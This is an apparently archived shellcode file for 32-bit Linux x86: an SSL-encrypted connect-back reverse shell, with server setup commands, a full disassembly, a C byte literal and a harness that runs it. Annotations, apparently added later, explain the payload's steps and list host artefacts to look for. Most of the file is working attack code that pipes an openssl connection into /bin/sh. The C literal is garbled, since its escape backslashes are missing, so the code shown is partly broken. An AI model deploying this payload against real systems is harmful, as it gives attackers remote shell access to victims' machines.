
# Title : Linux/x86-32 - ConnectBack with SSL connection - 422 bytes
# Published : 2011-06-08
# Author :


/*
**
** Title:     Linux/x86-32 - ConnectBack with SSL connection - 422 bytes
** Date:      2011-06-08
** Tested on: ArchLinux i686
** Author:    Jonathan Salwan - twitter: @jonathansalwan
**
** http://shell-storm.org
**
**
** Server configuration
** ===========================================================================
** jonathan@ArchLinux [ssl] $ openssl genrsa -des3 -out server.key 1024
** jonathan@ArchLinux [ssl] $ openssl req -new -key server.key -out server.csr
** jonathan@ArchLinux [ssl] $ cp server.key server.key.org
** jonathan@ArchLinux [ssl] $ openssl rsa -in server.key.org -out server.key
** jonathan@ArchLinux [ssl] $ openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt
** jonathan@ArchLinux [ssl] $ ll
** total 16
** -rw-r--r-- 1 jonathan users 757 Jun  8 09:36 server.crt
** -rw-r--r-- 1 jonathan users 603 Jun  8 09:36 server.csr
** -rw-r--r-- 1 jonathan users 887 Jun  8 09:36 server.key
** -rw-r--r-- 1 jonathan users 963 Jun  8 09:36 server.key.org
** jonathan@ArchLinux [ssl] $
**
**
** Running server
** ===========================================================================
** jonathan@ArchLinux [ssl] $ openssl s_server -key server.key -cert server.crt -accept 8080
**
**
** Once the server is listening, you can send the shellcode.
** Warning! The client needs tsch and openssl installed.
**
**
** Shellcode information
** ===========================================================================
**
** Reverse TCP with SSL (why not)
** Linux x86 32bits
** 422 bytes
**
**
** ASM sources
** =========================================================================== 
**
** 08048054 <main>:
** 8048054:     31 c0                     xor    %eax,%eax
** 8048056:     50                        push   %eax
** 8048057:     6a 65                     push   $0x65
** 8048059:     68 6b 70 69 70            push   $0x7069706b
** 804805e:     68 2f 62 61 63            push   $0x6361622f
** 8048063:     68 2f 74 6d 70            push   $0x706d742f
** 8048068:     89 e3                     mov    %esp,%ebx
** 804806a:     b0 0a                     mov    $0xa,%al
** 804806c:     cd 80                     int    $0x80
** 804806e:     85 c0                     test   %eax,%eax
** 8048070:     75 32                     jne    80480a4 <del2>
** 8048072:     31 c0                     xor    %eax,%eax
** 8048074:     31 db                     xor    %ebx,%ebx
** 8048076:     31 d2                     xor    %edx,%edx
** 8048078:     b3 01                     mov    $0x1,%bl
** 804807a:     31 c0                     xor    %eax,%eax
** 804807c:     50                        push   %eax
** 804807d:     6a 6e                     push   $0x6e
** 804807f:     66 68 64 5c               pushw  $0x5c64
** 8048083:     68 6c 65 74 65            push   $0x6574656c
** 8048088:     68 65 20 64 65            push   $0x65642065
** 804808d:     68 6b 70 69 70            push   $0x7069706b
** 8048092:     68 2f 62 61 63            push   $0x6361622f
** 8048097:     68 2f 74 6d 70            push   $0x706d742f
** 804809c:     89 e1                     mov    %esp,%ecx
** 804809e:     b2 17                     mov    $0x17,%dl
** 80480a0:     b0 04                     mov    $0x4,%al
** 80480a2:     cd 80                     int    $0x80

** 080480a4 <del2>:
** 80480a4:     31 c0                     xor    %eax,%eax
** 80480a6:     50                        push   %eax
** 80480a7:     66 68 73 6c               pushw  $0x6c73
** 80480ab:     68 2f 63 62 73            push   $0x7362632f
** 80480b0:     68 2f 74 6d 70            push   $0x706d742f
** 80480b5:     89 e3                     mov    %esp,%ebx
** 80480b7:     b0 0a                     mov    $0xa,%al
** 80480b9:     cd 80                     int    $0x80
** 80480bb:     85 c0                     test   %eax,%eax
** 80480bd:     75 2a                     jne    80480e9 <open>
** 80480bf:     31 c0                     xor    %eax,%eax
** 80480c1:     31 db                     xor    %ebx,%ebx
** 80480c3:     31 d2                     xor    %edx,%edx
** 80480c5:     50                        push   %eax
** 80480c6:     68 65 64 5c 6e            push   $0x6e5c6465
** 80480cb:     68 65 6c 65 74            push   $0x74656c65
** 80480d0:     68 73 6c 20 64            push   $0x64206c73
** 80480d5:     68 2f 63 62 73            push   $0x7362632f
** 80480da:     68 2f 74 6d 70            push   $0x706d742f
** 80480df:     89 e1                     mov    %esp,%ecx
** 80480e1:     b3 01                     mov    $0x1,%bl
** 80480e3:     b2 14                     mov    $0x14,%dl
** 80480e5:     b0 04                     mov    $0x4,%al
** 80480e7:     cd 80                     int    $0x80
**
** 080480e9 <open>:
** 80480e9:     31 c0                     xor    %eax,%eax
** 80480eb:     31 c9                     xor    %ecx,%ecx
** 80480ed:     31 d2                     xor    %edx,%edx
** 80480ef:     66 b9 41 04               mov    $0x441,%cx
** 80480f3:     66 ba a4 01               mov    $0x1a4,%dx
** 80480f7:     50                        push   %eax
** 80480f8:     66 68 73 6c               pushw  $0x6c73
** 80480fc:     68 2f 63 62 73            push   $0x7362632f
** 8048101:     68 2f 74 6d 70            push   $0x706d742f
** 8048106:     89 e3                     mov    %esp,%ebx
** 8048108:     b0 05                     mov    $0x5,%al
** 804810a:     cd 80                     int    $0x80
** 804810c:     89 c6                     mov    %eax,%esi
**
** 0804810e <wtite>:
** 804810e:     31 d2                     xor    %edx,%edx
** 8048110:     89 f3                     mov    %esi,%ebx
** 8048112:     31 c0                     xor    %eax,%eax
** 8048114:     50                        push   %eax
** 8048115:     66 68 70 65               pushw  $0x6570
** 8048119:     68 63 6b 70 69            push   $0x69706b63
** 804811e:     68 70 2f 62 61            push   $0x61622f70
** 8048123:     68 3e 2f 74 6d            push   $0x6d742f3e
** 8048128:     68 73 68 20 31            push   $0x31206873
** 804812d:     68 6e 2f 74 63            push   $0x63742f6e
** 8048132:     68 20 2f 62 69            push   $0x69622f20
** 8048137:     68 70 65 20 7c            push   $0x7c206570
** 804813c:     68 63 6b 70 69            push   $0x69706b63
** 8048141:     68 70 2f 62 61            push   $0x61622f70
** 8048146:     68 3c 2f 74 6d            push   $0x6d742f3c
**
** "x6cx6fx63x61x6cx68x6fx73x74x3ax38x30x38x30" >----------+
** localhost:8080                                                        |
** If you change that, you need to change write(..., ..., size_t) (%edx) |
**                                                                       |
** 804814b:     68 38 30 20 30            push   $0x30203038         <---+
** 8048150:     68 74 3a 38 30            push   $0x30383a74         <---+
** 8048155:     68 6c 68 6f 73            push   $0x736f686c         <---+
** 804815a:     68 6c 6f 63 61            push   $0x61636f6c         <---+
**
**
** 804815f:     68 65 63 74 20            push   $0x20746365
** 8048164:     68 63 6f 6e 6e            push   $0x6e6e6f63
** 8048169:     68 6e 74 20 2d            push   $0x2d20746e
** 804816e:     68 63 6c 69 65            push   $0x65696c63
** 8048173:     68 6c 20 73 5f            push   $0x5f73206c
** 8048178:     68 65 6e 73 73            push   $0x73736e65
** 804817d:     68 6e 2f 6f 70            push   $0x706f2f6e
** 8048182:     68 72 2f 62 69            push   $0x69622f72
** 8048187:     68 20 2f 75 73            push   $0x73752f20
** 804818c:     68 70 20 26 26            push   $0x26262070
** 8048191:     68 69 70 65 20            push   $0x20657069
** 8048196:     68 61 63 6b 70            push   $0x706b6361
** 804819b:     68 6d 70 2f 62            push   $0x622f706d
** 80481a0:     68 64 20 2f 74            push   $0x742f2064
** 80481a5:     68 6d 6b 6e 6f            push   $0x6f6e6b6d
** 80481aa:     89 e1                     mov    %esp,%ecx
** 80481ac:     b2 77                     mov    $0x77,%dl
** 80481ae:     31 c0                     xor    %eax,%eax
** 80481b0:     b0 04                     mov    $0x4,%al
** 80481b2:     cd 80                     int    $0x80
**
** 080481b4 <close>:
** 80481b4:     31 c0                     xor    %eax,%eax
** 80481b6:     b0 06                     mov    $0x6,%al
** 80481b8:     89 f3                     mov    %esi,%ebx
** 80481ba:     cd 80                     int    $0x80
**
** 080481bc <execve>:
** 80481bc:     31 c0                     xor    %eax,%eax
** 80481be:     50                        push   %eax
** 80481bf:     66 68 73 6c               pushw  $0x6c73
** 80481c3:     68 2f 63 62 73            push   $0x7362632f
** 80481c8:     68 2f 74 6d 70            push   $0x706d742f
** 80481cd:     89 e3                     mov    %esp,%ebx
** 80481cf:     50                        push   %eax
** 80481d0:     66 68 2d 65               pushw  $0x652d
** 80481d4:     89 e1                     mov    %esp,%ecx
** 80481d6:     50                        push   %eax
** 80481d7:     6a 68                     push   $0x68
** 80481d9:     66 68 2f 73               pushw  $0x732f
** 80481dd:     68 2f 62 69 6e            push   $0x6e69622f
** 80481e2:     89 e2                     mov    %esp,%edx
** 80481e4:     50                        push   %eax
** 80481e5:     53                        push   %ebx
** 80481e6:     51                        push   %ecx
** 80481e7:     52                        push   %edx
** 80481e8:     89 e1                     mov    %esp,%ecx
** 80481ea:     89 d3                     mov    %edx,%ebx
** 80481ec:     31 d2                     xor    %edx,%edx
** 80481ee:     b0 0b                     mov    $0xb,%al
** 80481f0:     cd 80                     int    $0x80
**
** 080481f2 <exit>:
** 80481f2:     31 c0                     xor    %eax,%eax
** 80481f4:     b0 01                     mov    $0x1,%al
** 80481f6:     31 db                     xor    %ebx,%ebx
** 80481f8:     cd 80                     int    $0x80
**
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Raw payload bytes, as a C string literal.
 *
 * NOTE(review): in this copy every "\x" escape has lost its backslash, so
 * the literal is plain ASCII text ("x31xc0...") rather than the opcode
 * bytes listed in the disassembly above; strlen(SC) will therefore not be
 * 422 here.
 *
 * Behaviour, as read from the disassembly above (useful for detection):
 * the payload unlinks and recreates /tmp/cbsl, writes a one-line shell
 * script into it that creates a FIFO at /tmp/backpipe with mknod and runs
 * "/usr/bin/openssl s_client -connect localhost:8080" piped into /bin/sh,
 * then execve()s "/bin/sh -e /tmp/cbsl". Host-side artefacts to look for
 * are therefore /tmp/cbsl, /tmp/backpipe and an openssl s_client child of
 * /bin/sh; the callback target is the literal "localhost:8080" string
 * marked below.
 */
char SC[] = "x31xc0x50x6ax65x68x6bx70x69x70x68x2fx62x61x63"
            "x68x2fx74x6dx70x89xe3xb0x0axcdx80x85xc0x75x32"
            "x31xc0x31xdbx31xd2xb3x01x31xc0x50x6ax6ex66x68"
            "x64x5cx68x6cx65x74x65x68x65x20x64x65x68x6bx70"
            "x69x70x68x2fx62x61x63x68x2fx74x6dx70x89xe1xb2"
            "x17xb0x04xcdx80x31xc0x50x66x68x73x6cx68x2fx63"
            "x62x73x68x2fx74x6dx70x89xe3xb0x0axcdx80x85xc0"
            "x75x2ax31xc0x31xdbx31xd2x50x68x65x64x5cx6ex68"
            "x65x6cx65x74x68x73x6cx20x64x68x2fx63x62x73x68"
            "x2fx74x6dx70x89xe1xb3x01xb2x14xb0x04xcdx80x31"
            "xc0x31xc9x31xd2x66xb9x41x04x66xbaxa4x01x50x66"
            "x68x73x6cx68x2fx63x62x73x68x2fx74x6dx70x89xe3"
            "xb0x05xcdx80x89xc6x31xd2x89xf3x31xc0x50x66x68"
            "x70x65x68x63x6bx70x69x68x70x2fx62x61x68x3ex2f"
            "x74x6dx68x73x68x20x31x68x6ex2fx74x63x68x20x2f"
            "x62x69x68x70x65x20x7cx68x63x6bx70x69x68x70x2f"
            "x62x61x68x3cx2fx74x6d"
            /* "localhost:8080" -- the callback address; the write() length
               in %dl (0x77) in the disassembly above must match it */
            "x68x38x30x20x30x68x74x3ax38x30x68x6cx68x6fx73"
            "x68x6cx6fx63x61"
            /* end of the "localhost:8080" pushes */
            "x68x65x63x74x20x68x63x6fx6ex6ex68x6ex74x20x2d"
            "x68x63x6cx69x65x68x6cx20x73x5fx68x65x6ex73x73"
            "x68x6ex2fx6fx70x68x72x2fx62x69x68x20x2fx75x73"
            "x68x70x20x26x26x68x69x70x65x20x68x61x63x6bx70"
            "x68x6dx70x2fx62x68x64x20x2fx74x68x6dx6bx6ex6f"
            "x89xe1xb2x77x31xc0xb0x04xcdx80x31xc0xb0x06x89"
            "xf3xcdx80x31xc0x50x66x68x73x6cx68x2fx63x62x73"
            "x68x2fx74x6dx70x89xe3x50x66x68x2dx65x89xe1x50"
            "x6ax68x66x68x2fx73x68x2fx62x69x6ex89xe2x50x53"
            "x51x52x89xe1x89xd3x31xd2xb0x0bxcdx80x31xc0xb0"
            "x01x31xdbxcdx80";


/*
 * Test harness: prints the payload length, then transfers control into
 * the SC byte array.
 */
int main(void)
{
   /* Defect: "%d" is paired with a size_t argument (strlen returns
      size_t), which is a format/argument type mismatch and undefined
      behaviour; "%zu" is the matching specifier. The trailing "n" in the
      literal is presumably a newline escape whose backslash was lost in
      this copy. */
   fprintf(stdout,"Length: %dn",strlen(SC));
   /* Casts a writable global array to a function pointer and calls it.
      NOTE(review): this only works if the data segment is executable --
      on a build with NX / W^X enforced the call faults; the author's
      "Tested on" note gives no linker flags, so confirm the build setup. */
   (*(void(*)()) SC)();
}